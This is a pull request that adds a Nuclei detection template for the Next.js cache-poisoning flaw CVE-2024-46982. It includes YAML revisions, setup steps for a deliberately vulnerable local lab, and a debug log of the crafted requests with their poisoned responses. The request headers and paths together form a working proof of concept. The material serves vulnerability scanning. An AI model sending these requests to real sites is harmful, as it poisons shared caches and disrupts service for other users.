### PR TITLE
Added CVE-2024-46982

### DIFF
--- a/http/cves/2024/CVE-2024-46982.yaml
+++ b/http/cves/2024/CVE-2024-46982.yaml
@@ -5,16 +5,12 @@ info:
   author: hnd3884
   severity: high
   description: |
-    Next.js versions between 13.5.1 and 14.2.9 (inclusive) are vulnerable to cache poisoning of non-dynamic server-side rendered routes in the Pages Router.
-    By sending a crafted HTTP request, an attacker can force a non-dynamic SSR route (e.g. `pages/dashboard.tsx`, not dynamic routes like `pages/blog/[slug].tsx`)
-    to be cached incorrectly, due to how Next.js handles caching of SSR routes. Vulnerable responses may include headers like 
-    `Cache-Control: s-maxage=1, stale-while-revalidate`, which some upstream CDNs may obey, resulting in the poisoned response being served to other users.
-    This issue has been fixed in Next.js versions **13.5.7**, **14.2.10**, and later.  
-    We strongly recommend upgrading to a safe version.
+    Next.js versions between 13.5.1 and 14.2.9 (inclusive) are vulnerable to cache poisoning of non-dynamic server-side rendered routes in the Pages Router. By sending a crafted HTTP request, an attacker can force a non-dynamic SSR route (e.g. `pages/dashboard.tsx`, not dynamic routes like `pages/blog/[slug].tsx`) to be cached incorrectly, due to how Next.js handles caching of SSR routes. Vulnerable responses may include headers like `Cache-Control: s-maxage=1, stale-while-revalidate`, which some upstream CDNs may obey, resulting in the poisoned response being served to other users. This issue has been fixed in Next.js versions **13.5.7**, **14.2.10**, and later. We strongly recommend upgrading to a safe version.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2024-46982
     - https://github.com/vercel/next.js/commit/7ed7f125e07ef0517a331009ed7e32691ba403d3
     - https://github.com/vercel/next.js/commit/bd164d53af259c05f1ab434004bcfdd3837d7cda
+    - https://github.com/advisories/GHSA-gp8f-8m3g-qvj9
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
     cvss-score: 7.5

--- a/http/cves/2024/CVE-2024-46982.yaml
+++ b/http/cves/2024/CVE-2024-46982.yaml
@@ -25,67 +25,60 @@ info:
     publicwww-query: "next.config.js"
   tags: cve,cve2024,nextjs,cache,poisoning,ssr,non-dynamic
 
-flow: headless(1) && http(1) && headless(2) && headless(3)
+variables:
+  cache-buster: "{{rand_text_alpha(32)}}"
 
-headless:
-  - steps: # Access original request
-      - action: navigate
-        args:
-          url: "{{BaseURL}}"
-      - action: waitload
-  - steps: # Validate cache poisoning
-      - action: navigate
-        args:
-          url: "{{BaseURL}}"
-      - action: waitload
-    matchers:
-      - type: dsl
-        dsl:
-          - "md5(headless_2_data) != md5(headless_1_data)" # Compare with original request
-          - 'starts_with(headless_2_data, "<html><head></head><body>{\"pageProps\":")' # Check if poisoned content start with '{"pageProps:'
-        condition: and
+flow: http(1) && http(2) && http(3) && http(4)
+
+http:
+  - method: GET # Get buildId
+    path:
+      - "{{BaseURL}}?cache-buster={{cache-buster}}"
     extractors:
       - type: regex
         part: body
+        name: build_id
         regex:
-          - '(pageProps":{.+?})'
-  - steps: # Wait for s-maxage to expire and revalidate
-      - action: sleep
-        args:
-          duration: "{{s_maxage}}"
-      - action: navigate
-        args:
-          url: "{{BaseURL}}"
-      - action: waitload
-
-http:
-  - method: GET # Trigger cache poisoning
-    path:
-      - "{{BaseURL}}?__nextDataReq=1"
-    headers:
-      x-now-route-matches: "1"
-      # x-NextJS-cache: "INVALIDATE"
-    matchers-condition: and
-    matchers:
-      - type: regex
-        part: header
-        regex:
-          - "Cache-Control: s-maxage=[0-9]+?, stale-while-revalidate"
-        internal: true
-      - type: word
-        part: header
-        words:
-          - "application/json" # Ensure response is JSON
-        internal: true
-      - type: dsl
-        dsl:
-          - 'starts_with(http_body, "{\"pageProps\":")' # Check if poisoned content start with '{"pageProps:'
-        internal: true
-    extractors:
-      - type: regex
-        part: header
-        name: s_maxage
-        regex:
-          - "s-maxage=([0-9]+?)"
+          - '"buildId":"(.+?)"'
         group: 1
         internal: true
+
+  - method: GET # Trigger cache poisoning
+    path:
+      - "{{BaseURL}}?cache-buster={{cache-buster}}&__nextDataReq=1"
+    headers:
+      x-now-route-matches: "1"
+      X-Nextjs-Cache: "INVALIDATE"
+    matchers:
+      - type: dsl
+        dsl:
+          - 'http_2_content_type == "application/json"'
+          - 'starts_with(http_2_body, "{\"pageProps\":")'
+          - 'http_2_cache_control == "s-maxage=1, stale-while-revalidate"'
+        internal: true
+        condition: and
+
+  - method: GET # Trigger cache poisoning another way
+    path:
+      - "{{RootURL}}/_next/data/{{build_id}}/{{File}}.json?cache-buster={{cache-buster}}"
+    headers:
+      x-now-route-matches: "1"
+      X-Nextjs-Cache: "INVALIDATE"
+    matchers:
+      - type: dsl
+        dsl:
+          - 'http_3_content_type == "application/json"'
+          - 'starts_with(http_3_body, "{\"pageProps\":")'
+          - 'http_3_cache_control == "s-maxage=1, stale-while-revalidate"'
+        internal: true
+        condition: and
+
+  - method: GET # Check poisonsed response
+    path:
+      - "{{BaseURL}}?cache-buster={{cache-buster}}"
+    matchers:
+      - type: dsl
+        dsl:
+          - "http_4_body != http_1_body" # Compare with original request
+          - 'starts_with(http_4_body, "{\"pageProps\":")' # Check if poisoned content start with '{"pageProps:'
+        condition: and

--- a/http/cves/2024/CVE-2024-46982.yaml
+++ b/http/cves/2024/CVE-2024-46982.yaml
@@ -25,28 +25,67 @@ info:
     publicwww-query: "next.config.js"
   tags: cve,cve2024,nextjs,cache,poisoning,ssr,non-dynamic
 
+flow: headless(1) && http(1) && headless(2) && headless(3)
+
+headless:
+  - steps: # Access original request
+      - action: navigate
+        args:
+          url: "{{BaseURL}}"
+      - action: waitload
+  - steps: # Validate cache poisoning
+      - action: navigate
+        args:
+          url: "{{BaseURL}}"
+      - action: waitload
+    matchers:
+      - type: dsl
+        dsl:
+          - "md5(headless_2_data) != md5(headless_1_data)" # Compare with original request
+          - 'starts_with(headless_2_data, "<html><head></head><body>{\"pageProps\":")' # Check if poisoned content start with '{"pageProps:'
+        condition: and
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - '(pageProps":{.+?})'
+  - steps: # Wait for s-maxage to expire and revalidate
+      - action: sleep
+        args:
+          duration: "{{s_maxage}}"
+      - action: navigate
+        args:
+          url: "{{BaseURL}}"
+      - action: waitload
+
 http:
-  - method: GET
+  - method: GET # Trigger cache poisoning
     path:
       - "{{BaseURL}}?__nextDataReq=1"
     headers:
       x-now-route-matches: "1"
-      x-NextJS-cache: "INVALIDATE"
-
+      # x-NextJS-cache: "INVALIDATE"
     matchers-condition: and
     matchers:
+      - type: regex
+        part: header
+        regex:
+          - "Cache-Control: s-maxage=[0-9]+?, stale-while-revalidate"
+        internal: true
       - type: word
         part: header
         words:
-          - "Cache-Control: s-maxage=1, stale-while-revalidate" # vulnerable cache header
-          - "application/json" # ensure it's a JSON response
-      - type: word
-        part: body
-        words:
-          - "pageProps"
-
+          - "application/json" # Ensure response is JSON
+        internal: true
+      - type: dsl
+        dsl:
+          - 'starts_with(http_body, "{\"pageProps\":")' # Check if poisoned content start with '{"pageProps:'
+        internal: true
     extractors:
-      - type: regex # type of the extractor
-        part: body # part of the response (header,body,all)
+      - type: regex
+        part: header
+        name: s_maxage
         regex:
-          - '(pageProps":{.+?})' # regex to use for extraction.
+          - "s-maxage=([0-9]+?)"
+        group: 1
+        internal: true

--- a/http/cves/2024/CVE-2024-46982.yaml
+++ b/http/cves/2024/CVE-2024-46982.yaml
@@ -1,0 +1,56 @@
+id: CVE-2024-46982
+
+info:
+  name: Next.js Pages Router <= 14.2.9 - Cache Poisoning of Non-Dynamic SSR Routes
+  author: hnd3884
+  severity: high
+  description: |
+    Next.js versions between 13.5.1 and 14.2.9 (inclusive) are vulnerable to cache poisoning of non-dynamic server-side rendered routes in the Pages Router.
+    By sending a crafted HTTP request, an attacker can force a non-dynamic SSR route (e.g. `pages/dashboard.tsx`, not dynamic routes like `pages/blog/[slug].tsx`)
+    to be cached incorrectly, due to how Next.js handles caching of SSR routes. Vulnerable responses may include headers like 
+    `Cache-Control: s-maxage=1, stale-while-revalidate`, which some upstream CDNs may obey, resulting in the poisoned response being served to other users.
+    This issue has been fixed in Next.js versions **13.5.7**, **14.2.10**, and later.  
+    We strongly recommend upgrading to a safe version.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-46982
+    - https://github.com/vercel/next.js/commit/7ed7f125e07ef0517a331009ed7e32691ba403d3
+    - https://github.com/vercel/next.js/commit/bd164d53af259c05f1ab434004bcfdd3837d7cda
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2024-46982
+    cwe-id: CWE-639
+    epss-score: 0.015
+    cpe: cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
+  metadata:
+    verified: true
+    vendor: vercel
+    product: next.js
+    publicwww-query: "next.config.js"
+  tags: cve,cve2024,nextjs,cache,poisoning,ssr,non-dynamic
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}?__nextDataReq=1"
+    headers:
+      x-now-route-matches: "1"
+      x-NextJS-cache: "INVALIDATE"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "Cache-Control: s-maxage=1, stale-while-revalidate" # vulnerable cache header
+          - "application/json" # ensure it's a JSON response
+      - type: word
+        part: body
+        words:
+          - "pageProps"
+
+    extractors:
+      - type: regex # type of the extractor
+        part: body # part of the response (header,body,all)
+        regex:
+          - '(pageProps":{.+?})' # regex to use for extraction.


### PR DESCRIPTION
 /claim #13204
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2024-46982
- References:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-46982
    - https://github.com/vercel/next.js/commit/7ed7f125e07ef0517a331009ed7e32691ba403d3
    - https://github.com/vercel/next.js/commit/bd164d53af259c05f1ab434004bcfdd3837d7cda
    - https://github.com/advisories/GHSA-gp8f-8m3g-qvj9

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

#### The template do the following
- Access vulnerable url, get buildId
- Trigger cache poisoning with 2 ways `__nextDataReq=1` and `{{RootURL}}/_next/data/{{build_id}}/{{File}}.json`, check for cache poisoning by 
    - response type -> json
    - check if body start with `{"pageProps":`
    - Cache control in reponse is "s-maxage=1, stale-while-revalidate"
- Access vulnerable again, check cache poisoned successfully by
    - check if response different from first access in step 1
    - check if body start with `{"pageProps":`

#### vulnerable lab setup
1. Create app with these opion choices
<img width="717" height="120" alt="image" src="https://github.com/user-attachments/assets/c3449de5-83cf-45cc-84d4-6a55f01e53b2" />

```bash
npx create-next-app@13.5.2 vul-lab
cd vul-lab
```
2. create src/pages/poc.tsx file
```typescript
// pages/poc.tsx
import { GetServerSidePropsContext } from "next";

type Props = {
  userAgent: string;
};

export default function Poc({ userAgent }: Props) {
  return <div>{userAgent}</div>; // raw injection
}

export async function getServerSideProps(context: GetServerSidePropsContext) {
  const userAgent = context.req.headers['user-agent']; // attacker-controlled

  return {
    props: {
      userAgent, // goes straight to render
    }
  };
}
```
3. Change dependencies in package.json
```json
{
    "@types/node": "24.3.1",
    "@types/react": "18.2.0",
    "@types/react-dom": "18.2.0",
    "eslint": "8.0.0",
    "eslint-config-next": "13.5.5",
    "next": "13.5.5",
    "react": "18.2.0",
    "react-dom": "18.2.0",
    "typescript": "5.9.2"
  }
}
```
4. Install, build and run
```bash
npm install
npm run build
npm run start
```

#### debug
```bash
nuclei -t /mnt/d/1day/nextjs/CVE-2024-46982.yaml -u "http://172.20.224.1:9000/poc" -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.7

                projectdiscovery.io

[INF] Current nuclei version: v3.4.7 (outdated)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2024-46982] Dumped HTTP request for http://172.20.224.1:9000/poc?cache-buster=RepfNoyeSoknFFWINzkIUDnXCrAhHGal

GET /poc?cache-buster=RepfNoyeSoknFFWINzkIUDnXCrAhHGal HTTP/1.1
Host: 172.20.224.1:9000
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2024-46982] Dumped HTTP response http://172.20.224.1:9000/poc?cache-buster=RepfNoyeSoknFFWINzkIUDnXCrAhHGal

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Wed, 17 Sep 2025 01:13:59 GMT
Etag: "rveofohpqu16i"
Vary: Accept-Encoding
X-Powered-By: Next.js

<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><meta name="next-head-count" content="2"/><link rel="preload" href="/_next/static/css/876d048b5dab7c28.css" as="style"/><link rel="stylesheet" href="/_next/static/css/876d048b5dab7c28.css" data-n-g=""/><noscript data-n-css=""></noscript><script defer="" nomodule="" src="/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"></script><script src="/_next/static/chunks/webpack-fd8027ecb5121007.js" defer=""></script><script src="/_next/static/chunks/framework-0c7baedefba6b077.js" defer=""></script><script src="/_next/static/chunks/main-3555597852264402.js" defer=""></script><script src="/_next/static/chunks/pages/_app-39c1abd0d870f45d.js" defer=""></script><script src="/_next/static/chunks/pages/poc-d197c025cdab8378.js" defer=""></script><script src="/_next/static/lEWpxRfhxfnVeJnWWAAf7/_buildManifest.js" defer=""></script><script src="/_next/static/lEWpxRfhxfnVeJnWWAAf7/_ssgManifest.js" defer=""></script></head><body><div id="__next"><div>Mozilla/5.0 (Kubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0</div></div><script id="__NEXT_DATA__" type="application/json">{"props":{"pageProps":{"userAgent":"Mozilla/5.0 (Kubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"},"__N_SSP":true},"page":"/poc","query":{"cache-buster":"RepfNoyeSoknFFWINzkIUDnXCrAhHGal"},"buildId":"lEWpxRfhxfnVeJnWWAAf7","isFallback":false,"isExperimentalCompile":false,"gssp":true,"scriptLoader":[]}</script></body></html>
[INF] [CVE-2024-46982] Dumped HTTP request for http://172.20.224.1:9000/poc?cache-buster=RepfNoyeSoknFFWINzkIUDnXCrAhHGal&__nextDataReq=1

GET /poc?cache-buster=RepfNoyeSoknFFWINzkIUDnXCrAhHGal&__nextDataReq=1 HTTP/1.1
Host: 172.20.224.1:9000
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
X-Nextjs-Cache: INVALIDATE
x-now-route-matches: 1
Accept-Encoding: gzip

[DBG] [CVE-2024-46982] Dumped HTTP response http://172.20.224.1:9000/poc?cache-buster=RepfNoyeSoknFFWINzkIUDnXCrAhHGal&__nextDataReq=1

HTTP/1.1 200 OK
Connection: close
Content-Length: 164
Cache-Control: s-maxage=1, stale-while-revalidate
Content-Type: application/json
Date: Wed, 17 Sep 2025 01:13:59 GMT
Etag: "4os6bf3ief4k"
Vary: Accept-Encoding
X-Nextjs-Cache: MISS

{"pageProps":{"userAgent":"Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15"},"__N_SSP":true}
[INF] [CVE-2024-46982] Dumped HTTP request for http://172.20.224.1:9000/_next/data/lEWpxRfhxfnVeJnWWAAf7/poc.json?cache-buster=RepfNoyeSoknFFWINzkIUDnXCrAhHGal

GET /_next/data/lEWpxRfhxfnVeJnWWAAf7/poc.json?cache-buster=RepfNoyeSoknFFWINzkIUDnXCrAhHGal HTTP/1.1
Host: 172.20.224.1:9000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
X-Nextjs-Cache: INVALIDATE
x-now-route-matches: 1
Accept-Encoding: gzip

[DBG] [CVE-2024-46982] Dumped HTTP response http://172.20.224.1:9000/_next/data/lEWpxRfhxfnVeJnWWAAf7/poc.json?cache-buster=RepfNoyeSoknFFWINzkIUDnXCrAhHGal

HTTP/1.1 200 OK
Connection: close
Content-Length: 164
Cache-Control: s-maxage=1, stale-while-revalidate
Content-Type: application/json
Date: Wed, 17 Sep 2025 01:13:59 GMT
Etag: "4os6bf3ief4k"
Vary: Accept-Encoding
X-Nextjs-Cache: MISS

{"pageProps":{"userAgent":"Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15"},"__N_SSP":true}
[INF] [CVE-2024-46982] Dumped HTTP request for http://172.20.224.1:9000/poc?cache-buster=RepfNoyeSoknFFWINzkIUDnXCrAhHGal

GET /poc?cache-buster=RepfNoyeSoknFFWINzkIUDnXCrAhHGal HTTP/1.1
Host: 172.20.224.1:9000
User-Agent: Mozilla/5.0 (ZZ; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2024-46982] Dumped HTTP response http://172.20.224.1:9000/poc?cache-buster=RepfNoyeSoknFFWINzkIUDnXCrAhHGal

HTTP/1.1 200 OK
Connection: close
Content-Length: 164
Cache-Control: s-maxage=1, stale-while-revalidate
Content-Type: text/html; charset=utf-8
Date: Wed, 17 Sep 2025 01:13:59 GMT
Etag: "4os6bf3ief4k"
Vary: Accept-Encoding
X-Nextjs-Cache: HIT
X-Powered-By: Next.js

{"pageProps":{"userAgent":"Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15"},"__N_SSP":true}
[CVE-2024-46982:dsl-1] [http] [high] http://172.20.224.1:9000/poc?cache-buster=RepfNoyeSoknFFWINzkIUDnXCrAhHGal
```

#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)